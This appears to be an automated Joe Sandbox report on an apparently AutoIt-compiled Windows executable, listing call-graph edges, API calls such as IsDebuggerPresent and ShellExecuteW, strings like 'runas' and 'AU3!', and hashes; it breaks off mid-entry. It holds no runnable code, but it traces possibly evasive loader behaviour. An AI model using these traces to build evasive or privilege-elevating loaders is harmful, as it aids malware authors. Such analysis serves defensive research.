95446 7ff79f8f29de 95444->95446 95734 7ff79f8f1d48 95444->95734 95446->95243 95448 7ff79f87653d 95447->95448 95449 7ff79f876542 95447->95449 95450 7ff79f8a4970 62 API calls 95448->95450 95451 7ff79f876558 95449->95451 95452 7ff79f87656f FreeLibrary 95449->95452 95450->95449 95451->95254 95452->95451 95454 7ff79f87a7c0 4 API calls 95453->95454 95455 7ff79f879d99 95454->95455 95455->95345 95457 7ff79f876490 95456->95457 95458 7ff79f876d74 LoadLibraryA 95456->95458 95457->95359 95457->95362 95458->95457 95459 7ff79f876d89 GetProcAddress 95458->95459 95459->95457 95461 7ff79f8a47fc 95460->95461 95462 7ff79f8a482a 95461->95462 95464 7ff79f8a485c 95461->95464 95521 7ff79f8a55d4 15 API calls abort 95462->95521 95466 7ff79f8a486f 95464->95466 95467 7ff79f8a4862 95464->95467 95465 7ff79f8a482f 95522 7ff79f8ab164 31 API calls 
_invalid_parameter_noinfo 95465->95522 95509 7ff79f8afeb4 95466->95509 95523 7ff79f8a55d4 15 API calls abort 95467->95523 95471 7ff79f8764cf 95471->95365 95471->95366 95473 7ff79f8a4890 95516 7ff79f8b0304 95473->95516 95474 7ff79f8a4883 95524 7ff79f8a55d4 15 API calls abort 95474->95524 95477 7ff79f8a48a3 95525 7ff79f89df60 LeaveCriticalSection 95477->95525 95663 7ff79f876d1c 95479->95663 95482 7ff79f876cf1 95483 7ff79f8764f7 95482->95483 95484 7ff79f876d0f FreeLibrary 95482->95484 95486 7ff79f876580 95483->95486 95484->95483 95485 7ff79f876d1c 2 API calls 95485->95482 95487 7ff79f894c68 4 API calls 95486->95487 95488 7ff79f8765b5 memcpy_s 95487->95488 95489 7ff79f8bc9f5 95488->95489 95490 7ff79f876740 CreateStreamOnHGlobal 95488->95490 95496 7ff79f876602 95488->95496 95667 7ff79f8f2e00 45 API calls 95489->95667 95492 7ff79f876759 FindResourceExW 95490->95492 95490->95496 95492->95496 95493 7ff79f8bc97e LoadResource 95495 7ff79f8bc997 SizeofResource 95493->95495 95493->95496 95494 7ff79f8767d8 45 API calls 95494->95496 95495->95496 95498 7ff79f8bc9ae LockResource 95495->95498 95496->95493 95496->95494 95497 7ff79f8bc9fd 95496->95497 95500 7ff79f8766e8 95496->95500 95499 7ff79f8767d8 45 API calls 95497->95499 95498->95496 95499->95500 95500->95373 95502 7ff79f8767f7 95501->95502 95503 7ff79f8bca6c 95501->95503 95668 7ff79f8a4c5c 95502->95668 95506 7ff79f8f240c 95687 7ff79f8f2200 95506->95687 95508 7ff79f8f2430 95508->95381 95526 7ff79f8ab9bc EnterCriticalSection 95509->95526 95511 7ff79f8afecb 95512 7ff79f8aff54 18 API calls 95511->95512 95513 7ff79f8afed6 95512->95513 95514 7ff79f8aba10 _isindst LeaveCriticalSection 95513->95514 95515 7ff79f8a4879 95514->95515 95515->95473 95515->95474 95527 7ff79f8b0040 95516->95527 95519 7ff79f8b035e 95519->95477 95521->95465 95522->95471 95523->95471 95524->95471 95532 7ff79f8b007d try_get_function 95527->95532 95529 7ff79f8b02de 95546 7ff79f8ab164 31 API calls _invalid_parameter_noinfo 95529->95546 95531 7ff79f8b021a 

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF79F873785), ref: 00007FF79F8737F2
                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00007FF79F873785), ref: 00007FF79F873807
                                                                                • GetFullPathNameW.KERNEL32(?,?,?,?,?,00007FF79F873785), ref: 00007FF79F87388D
                                                                                  • Part of subcall function 00007FF79F873F9C: GetFullPathNameW.KERNEL32(D000000000000000,00007FF79F8738BF,?,?,?,?,?,00007FF79F873785), ref: 00007FF79F873FFD
                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF79F873785), ref: 00007FF79F873924
                                                                                • MessageBoxA.USER32 ref: 00007FF79F8BB888
                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF79F873785), ref: 00007FF79F8BB8E1
                                                                                • GetForegroundWindow.USER32(?,?,?,?,?,00007FF79F873785), ref: 00007FF79F8BB968
                                                                                • ShellExecuteW.SHELL32 ref: 00007FF79F8BB98F
                                                                                  • Part of subcall function 00007FF79F873B84: GetSysColorBrush.USER32 ref: 00007FF79F873B9E
                                                                                  • Part of subcall function 00007FF79F873B84: LoadCursorW.USER32 ref: 00007FF79F873BAE
                                                                                  • Part of subcall function 00007FF79F873B84: LoadIconW.USER32 ref: 00007FF79F873BC3
                                                                                  • Part of subcall function 00007FF79F873B84: LoadIconW.USER32 ref: 00007FF79F873BDC
                                                                                  • Part of subcall function 00007FF79F873B84: LoadIconW.USER32 ref: 00007FF79F873BF5
                                                                                  • Part of subcall function 00007FF79F873B84: LoadImageW.USER32 ref: 00007FF79F873C21
                                                                                  • Part of subcall function 00007FF79F873B84: RegisterClassExW.USER32 ref: 00007FF79F873C85
                                                                                  • Part of subcall function 00007FF79F873CBC: CreateWindowExW.USER32 ref: 00007FF79F873D0C
                                                                                  • Part of subcall function 00007FF79F873CBC: CreateWindowExW.USER32 ref: 00007FF79F873D5F
                                                                                  • Part of subcall function 00007FF79F873CBC: ShowWindow.USER32 ref: 00007FF79F873D75
                                                                                  • Part of subcall function 00007FF79F876258: Shell_NotifyIconW.SHELL32 ref: 00007FF79F876350
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Load$IconWindow$CurrentDirectory$CreateFullNamePath$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell_Show
                                                                                • String ID: This is a third-party compiled AutoIt script.$runas
                                                                                • API String ID: 1593035822-3287110873
                                                                                • Opcode ID: 76182cffaad3958b66f0f298839ba34e861d4864c33095e5d1649e464e4238a0
                                                                                • Instruction ID: 6ca34f817267e5e1e2f6988ca8d6d4c6f18eb4a479c8ea769442642d3e3416dd
                                                                                • Opcode Fuzzy Hash: 76182cffaad3958b66f0f298839ba34e861d4864c33095e5d1649e464e4238a0
                                                                                • Instruction Fuzzy Hash: B9714261A1D9C395EA70BB30E880AF9E760BF51364FC00135D54D866ADDF6CE659D330

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                • String ID: AU3!$EA06$SCRIPT
                                                                                • API String ID: 3051347437-2925976212
                                                                                • Opcode ID: 2a37f8564f4c8a4eeb189e72451b06d9c699f805bbd4e08f379393b5199a872e
                                                                                • Instruction ID: d1cbb4bc29f9a1a6072f08e996638ef2bb22c0cc1c30c03d227489cdcbd85a1b
                                                                                • Opcode Fuzzy Hash: 2a37f8564f4c8a4eeb189e72451b06d9c699f805bbd4e08f379393b5199a872e
                                                                                • Instruction Fuzzy Hash: CC9121B2B0968186EBB0AB319444FFDA7A0BB45B88FC14135DE5D87784DF38E494A720

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Process$CurrentInfoSystemVersionWow64
                                                                                • String ID: |O
                                                                                • API String ID: 1568231622-607156228
                                                                                • Opcode ID: ec54e35f865d5c9bd0249927ea89c9316792baffd49f7d05aa477cb653b26fcc
                                                                                • Instruction ID: 76ada9c6bc435a13c6c5c8b2e364daac8fa72cff78396b8e6e5258a52d188fe6
                                                                                • Opcode Fuzzy Hash: ec54e35f865d5c9bd0249927ea89c9316792baffd49f7d05aa477cb653b26fcc
                                                                                • Instruction Fuzzy Hash: 5BD1AE21E1DAC285FAB1AB30A8905F5EB90AF917A4FC00036D58D832BDEF6CB551D731

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Directory$Handle$CloseCurrentLockSyncSystem$CreateErrorLastProcess
                                                                                • String ID:
                                                                                • API String ID: 1787492119-0
                                                                                • Opcode ID: b5529a047433c39029aa94f7abef1aaae7ba2a451b0d80efb392d77c1937dd44
                                                                                • Instruction ID: 5c7761cf813d63fc1e9b02d0ee0de77c885849c71b74a775bef59f804824c8fd
                                                                                • Opcode Fuzzy Hash: b5529a047433c39029aa94f7abef1aaae7ba2a451b0d80efb392d77c1937dd44
                                                                                • Instruction Fuzzy Hash: 69E1B022B18B8185EB60EB36D4406FDA3B0FB85B98F844536EE1D87799DF38E455C710
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                • String ID:
                                                                                • API String ID: 2695905019-0
                                                                                • Opcode ID: 0e40a590ccee8b84c2b17bba0c0d64c91c67e628f63cf05be15c9ff0c6569a5d
                                                                                • Instruction ID: 8c6e95067879b05f215c1e91570773d15622332d9164d9142e6bf0f53dad6def
                                                                                • Opcode Fuzzy Hash: 0e40a590ccee8b84c2b17bba0c0d64c91c67e628f63cf05be15c9ff0c6569a5d
                                                                                • Instruction Fuzzy Hash: 01F05450E18692C1EA747B34AC4D7B49360AF56B75F945330D47E4A2E4DF6C94589110

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: NameQueryValuewcscat$CloseFileFullModuleOpenPath
                                                                                • String ID: Include$Software\AutoIt v3\AutoIt$\Include\
                                                                                • API String ID: 2667193904-1575078665
                                                                                • Opcode ID: e4a1d1e4efa0bc87a7461a6a39f11fb0c9c767336ce2d992286509dae00062b4
                                                                                • Instruction ID: ece39453c992382438e8e48fd71a81c35301390344767b07c81dddabe0c4474f
                                                                                • Opcode Fuzzy Hash: e4a1d1e4efa0bc87a7461a6a39f11fb0c9c767336ce2d992286509dae00062b4
                                                                                • Instruction Fuzzy Hash: CB914F22A18AC395EB70BB34E8405F9A364FF84768FC01132E54D87AA9DF7CE255D720

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                • String ID: TaskbarCreated
                                                                                • API String ID: 129472671-2362178303
                                                                                • Opcode ID: 72f25fe2909dc216fe8e5bf23ccffbdf7394ac074e80fb2f1d04dd01aa152451
                                                                                • Instruction ID: 4e825c2d73764e329de8598da47816317884d293ce18cc86e322227f51844dff
                                                                                • Opcode Fuzzy Hash: 72f25fe2909dc216fe8e5bf23ccffbdf7394ac074e80fb2f1d04dd01aa152451
                                                                                • Instruction Fuzzy Hash: AE516D3291CAD381F7B0BB34EA84AF8E750AF55750FC40431D44D8A7A9DE6CF5A4A320

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                • String ID: AutoIt v3 GUI$TaskbarCreated
                                                                                • API String ID: 2914291525-2659433951
                                                                                • Opcode ID: 474949a99bec8184bed6bacf9f27c592b422b8b82249946e56584e62d8b9113a
                                                                                • Instruction ID: f02c9e6aa3cba4375f5b8a6eb3fd18d372ae929d7a8181a7c0045a6b4cab118b
                                                                                • Opcode Fuzzy Hash: 474949a99bec8184bed6bacf9f27c592b422b8b82249946e56584e62d8b9113a
                                                                                • Instruction Fuzzy Hash: BE313632A04B819AE720EF70E8843E877B4FB44768F900139CA5D96B6CDF7C9158CB90

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: DestroySendStringUninitializeUnregisterWindow
                                                                                • String ID: close all
                                                                                • API String ID: 1992507300-3243417748
                                                                                • Opcode ID: 0215e1cc10e3ea8240ae12a3d7c0b21f24d7e33af532eefbf93780fbe33f8b49
                                                                                • Instruction ID: 866bfff959d42c16b3a8b400665cf9dcf3b9744f78933353e43888e974113bcb
                                                                                • Opcode Fuzzy Hash: 0215e1cc10e3ea8240ae12a3d7c0b21f24d7e33af532eefbf93780fbe33f8b49
                                                                                • Instruction Fuzzy Hash: A6E15021B0998291EEA4FF66C550AFCA320BF94B54F944032DB1E57691DF3CE872A720

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                • String ID: AutoIt v3
                                                                                • API String ID: 423443420-1704141276
                                                                                • Opcode ID: b93c51c6ba6201518573a4e6f5cf88ec382112454fc31c9e44e1a0e1eb884e3c
                                                                                • Instruction ID: 1fae7c7a6b7d329bf5b91ad294b8480375b20d1e294b52b7a4f829282e936460
                                                                                • Opcode Fuzzy Hash: b93c51c6ba6201518573a4e6f5cf88ec382112454fc31c9e44e1a0e1eb884e3c
                                                                                • Instruction Fuzzy Hash: C9311836A08F829AE760EB61F8847E8B374BB84765F800139C94D97B2CDF7DD0548760

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                • String ID:
                                                                                • API String ID: 1617910340-0
                                                                                • Opcode ID: bd4a1088ede243f3322a3f1c9bbf7769167306ab08ad22946a7c562bc07e9b3d
                                                                                • Instruction ID: 17ebb8df769061755bc0dfbfdaefc3d51f5ac17e8f3c6f4249131c6b3080effb
                                                                                • Opcode Fuzzy Hash: bd4a1088ede243f3322a3f1c9bbf7769167306ab08ad22946a7c562bc07e9b3d
                                                                                • Instruction Fuzzy Hash: 64C1DE32B28B818AEBA0DB74D8817EC7761EB497A8F411235DE2E5B795DF38D065C310

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Message$Peek$DispatchInputStateTimeTranslatetime
                                                                                • String ID:
                                                                                • API String ID: 3249950245-0
                                                                                • Opcode ID: 3a286bfa12772c63719834a724bea86a086cad30a8da92a7678ebbb259785280
                                                                                • Instruction ID: 3edf118b7d65911dd806659b17d4b256a591c78467be3b2dac4f919279a2b631
                                                                                • Opcode Fuzzy Hash: 3a286bfa12772c63719834a724bea86a086cad30a8da92a7678ebbb259785280
                                                                                • Instruction Fuzzy Hash: B0227D32A0C6C286EBB4AF30D884BF9A7A0FB45B54F944136DA5D42699CF3CE465D720

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 849 7ff79f873cbc-7ff79f873d88 CreateWindowExW * 2 ShowWindow * 2
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Create$Show
                                                                                • String ID: AutoIt v3$d$edit
                                                                                • API String ID: 2813641753-2600919596
                                                                                • Opcode ID: 412c1a8e669cd880a5e6e492a58c687317b7b955f6e005d5c76c80bfee5a5580
                                                                                • Instruction ID: 1c8f452fc596109d27a9d89cb99f6a6be3a1499268edc24fe003ddc1853e1448
                                                                                • Opcode Fuzzy Hash: 412c1a8e669cd880a5e6e492a58c687317b7b955f6e005d5c76c80bfee5a5580
                                                                                • Instruction Fuzzy Hash: D4215472918F8186E720DF20F8887A9B7A0F7887A9F514135D54D86668CFBDD045CB10

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Initialize__scrt_fastfail__scrt_initialize_default_local_stdio_options__scrt_initialize_onexit_tables_invalid_parameter_noinfo_onexit_set_fmode
                                                                                • String ID:
                                                                                • API String ID: 2117695475-0
                                                                                • Opcode ID: c5af1a2945e0b28d35ed004d247bbfb317608e89d5a488d8119e5cdd6fee6e2c
                                                                                • Instruction ID: 9bde70ae9224c3765dc21e0c8923cbf24ac5530eeb0841dc8d4479239a9b482f
                                                                                • Opcode Fuzzy Hash: c5af1a2945e0b28d35ed004d247bbfb317608e89d5a488d8119e5cdd6fee6e2c
                                                                                • Instruction Fuzzy Hash: B811AF00E091C785FAF473F05866AF892C08F85311FD44438E81D6A6C3DE1CB4F56236

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 00007FF79F892D5C: MapVirtualKeyW.USER32(?,?,?,00007FF79F877FA5), ref: 00007FF79F892D8E
                                                                                  • Part of subcall function 00007FF79F892D5C: MapVirtualKeyW.USER32(?,?,?,00007FF79F877FA5), ref: 00007FF79F892D9C
                                                                                  • Part of subcall function 00007FF79F892D5C: MapVirtualKeyW.USER32(?,?,?,00007FF79F877FA5), ref: 00007FF79F892DAC
                                                                                  • Part of subcall function 00007FF79F892D5C: MapVirtualKeyW.USER32(?,?,?,00007FF79F877FA5), ref: 00007FF79F892DBC
                                                                                  • Part of subcall function 00007FF79F892D5C: MapVirtualKeyW.USER32(?,?,?,00007FF79F877FA5), ref: 00007FF79F892DCA
                                                                                  • Part of subcall function 00007FF79F892D5C: MapVirtualKeyW.USER32(?,?,?,00007FF79F877FA5), ref: 00007FF79F892DD8
                                                                                  • Part of subcall function 00007FF79F88EEC8: RegisterWindowMessageW.USER32 ref: 00007FF79F88EF76
                                                                                • GetStdHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79F87106D), ref: 00007FF79F878209
                                                                                • OleInitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79F87106D), ref: 00007FF79F87828F
                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79F87106D), ref: 00007FF79F8BD36A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmp
